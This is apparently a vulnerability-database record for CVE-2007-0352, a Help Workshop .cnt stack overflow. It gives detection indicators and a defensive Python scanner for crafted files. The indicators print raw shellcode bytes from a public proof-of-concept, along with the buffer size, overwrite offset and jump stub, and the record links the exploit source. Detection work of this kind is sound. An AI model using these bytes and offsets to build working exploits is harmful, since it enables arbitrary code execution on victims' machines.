CVE-2007-0352
Published 2007-01-19
Priority: P3 · 47 · critical · CVSS 2.0 score 9.3
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 36.38% (98.3rd percentile)
Stack-based buffer overflow in Microsoft Help Workshop 4.03.0002 allows user-assisted remote attackers to execute arbitrary code via a crafted .cnt file composed of lines that begin with an integer followed by a space and a long string.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | html_help_workshop | — | — |
Detection & IOCs (extracted from sources)
bytes:
0x66,0x83,0xc4,0x10,0x8b,0xc4,0x66,0x81,0xec,0x10,0x21,0x50,0x66,0x2d,0x11,0x11,0x50,0xb8,0x7a,0x6b,0x3f,0x79,0xff,0xd0,0x58,0x50,0x80,0x38,0x20,0x74,0x49,0x5b,0x53,0x33,0xc0,0xb0,0xff,0x50,0x66,0x81,0xeb,0x11,0x05,0x53,0xb8,0x23,0x2d,0x3f,0x79,0x3c,0xff,0x75,0x02,0x32,0xc0,0xff,0xd0,0x58,0x50,0x66,0x2d,0x11,0x05,0x32,0xdb,0x38,0x18,0x74,0x03,0x40,0xeb,0xf9,0x5b,0x53,0x32,0xd2,0xb1,0x5c,0x88,0x08,0x40,0x38,0x13,0x74,0x08,0x8a,0x0b,0x88,0x08,0x43,0x40,0xeb,0xf4,0x32,0xd2,0x88,0x10,0x58,0x50,0x66,0x2d,0x11,0x05,0x48,0x40,0x8b,0xd0,0x58,0x50,0x66,0x2d,0x11,0x11,0x50,0x33,0xc9,0x51,0x51,0x51,0x51,0x51,0x51,0x51,0x52,0xb8,0x10,0x50,0x3f,0x79,0xff,0xd0,0x33,0xc0,0x50,0xb8,0xda,0x69,0x3f,0x79,0xff,0xd0
bytes:
0xe9,0x1b,0xfe,0xff,0xff
- Malicious .cnt files triggering this vulnerability begin each line with an integer followed by a space and a long string; detect anomalously long lines (>500 bytes) in .cnt files opened by Help Workshop (hcw.exe).
- The exploit payload embeds the ASCII marker string '0 Microsoft Help Workshop PoC exploit by porkythepig' at the start of the crafted .cnt file; scan file content for this string.
- The exploit buffer is exactly 619 bytes; a .cnt file of exactly this size containing shellcode is a strong indicator of exploitation.
- The return address overwrite occurs at offset 0x210 (528 bytes) into the exploit buffer; stack inspection or crash analysis showing EIP control at this offset confirms exploitation.
- The backward jump stub (0xe9,0x1b,0xfe,0xff,0xff) is written at offset 0x218 in the buffer to redirect execution back into the shellcode; the presence of this 5-byte near-jump sequence near the overwrite region is a shellcode indicator.
- Monitor hcw.exe (Microsoft Help Workshop) for spawning unexpected child processes such as notepad.exe or other user-supplied executables, which is the payload delivery mechanism of this exploit.
- The exploit ships five hardcoded OS-specific API address tables (jmpEspPtr and API pointers); the correct table must match the target OS/DLL version, so detections relying on specific return addresses will only match the targeted OS variant.
- The vulnerability is user-assisted (the victim must open a crafted .cnt file); exploitation is not remote/unauthenticated without a social-engineering vector.
- Microsoft Help Workshop 4.03.0002 is a standard component of MS Visual Studio 6.0 and 2003 (.NET); the attack surface exists on any developer workstation with these IDE versions installed.
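The file-content indicators listed above (long integer-prefixed lines, the PoC marker string, the 619-byte buffer size, and the 5-byte backward jump stub) can be turned into a simple static scanner for .cnt files. The following is an added example written for this record, not code from the page or from the original exploit author; the indicator values come from the bullets above, and the sample .cnt contents (a benign contents file and two constructed suspicious buffers) are made up here to exercise the scanner and contain no exploit logic.

```python
import re
from typing import List

# Indicators taken from the CVE-2007-0352 record above.
MARKER = b"0 Microsoft Help Workshop PoC exploit by porkythepig"
JUMP_STUB = bytes([0xE9, 0x1B, 0xFE, 0xFF, 0xFF])  # 5-byte backward near jump
EXPLOIT_SIZE = 619   # size of the published exploit buffer, in bytes
LONG_LINE = 500      # per-line length threshold from the record

# Help Workshop .cnt content lines start with a heading level (an integer)
# followed by a single space; ":Base"/":Title" directives do not.
LEVEL_LINE = re.compile(rb"^\d+ ")


def scan_cnt(data: bytes) -> List[str]:
    """Return the names of the indicators that fire on the given .cnt bytes.

    Indicator order is fixed (marker, stub, size, then per-line hits) so the
    result is easy to compare in tests and in log output.
    """
    hits: List[str] = []
    if MARKER in data:
        hits.append("poc_marker_string")
    if JUMP_STUB in data:
        hits.append("backward_jump_stub")
    if len(data) == EXPLOIT_SIZE:
        hits.append("exact_exploit_size")
    # Only integer-prefixed lines are considered: a long :Title line is not
    # the pattern the record describes.
    for lineno, line in enumerate(data.splitlines(), start=1):
        if LEVEL_LINE.match(line) and len(line) > LONG_LINE:
            hits.append(f"long_level_line:{lineno}")
    return hits


def scan_file(path: str) -> List[str]:
    """Convenience wrapper: scan a .cnt file on disk."""
    with open(path, "rb") as fh:
        return scan_cnt(fh.read())


# --- constructed samples (not real files from the wild) -------------------

# A normal Help Workshop contents file.
BENIGN_CNT = (
    b":Base sample.hlp\r\n"
    b":Title Sample Help\r\n"
    b"1 Overview\r\n"
    b"2 Introduction=intro_topic\r\n"
)

# Marker string on the first line, then an over-long level line that also
# carries the jump-stub byte sequence. Filler only; no exploit content.
SUSPICIOUS_CNT = (
    MARKER + b"\r\n"
    + b"1 " + b"A" * 600 + JUMP_STUB + b"\r\n"
)

# A single integer-prefixed line padded to exactly the 619-byte buffer size.
SIZE_SAMPLE = b"1 " + b"B" * 617


if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_CNT),
                         ("suspicious", SUSPICIOUS_CNT),
                         ("size_match", SIZE_SAMPLE)):
        print(f"{name}: {scan_cnt(sample) or 'clean'}")
```

The per-line check deliberately ignores lines that do not start with an integer and a space, because that prefix is the shape of the crafted input the record describes; a scanner that flagged any long line would fire on ordinary `:Title` directives. The marker string and the exact 619-byte size only catch the published PoC, so `long_level_line` and `backward_jump_stub` are the indicators worth keeping for modified variants.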
No detection rules found.
No writeups or analysis indexed.
References:
- http://osvdb.org/31898
- http://secunia.com/advisories/23862
- http://securityreason.com/securityalert/2156
- http://securitytracker.com/id?1017530
- http://www.anspi.pl/~porkythepig/visualization/cnt-expl1.cpp
- http://www.securityfocus.com/archive/1/457210/100/0/threaded
- http://www.securityfocus.com/bid/22100
- https://exchange.xforce.ibmcloud.com/vulnerabilities/31555
- https://www.exploit-db.com/exploits/3149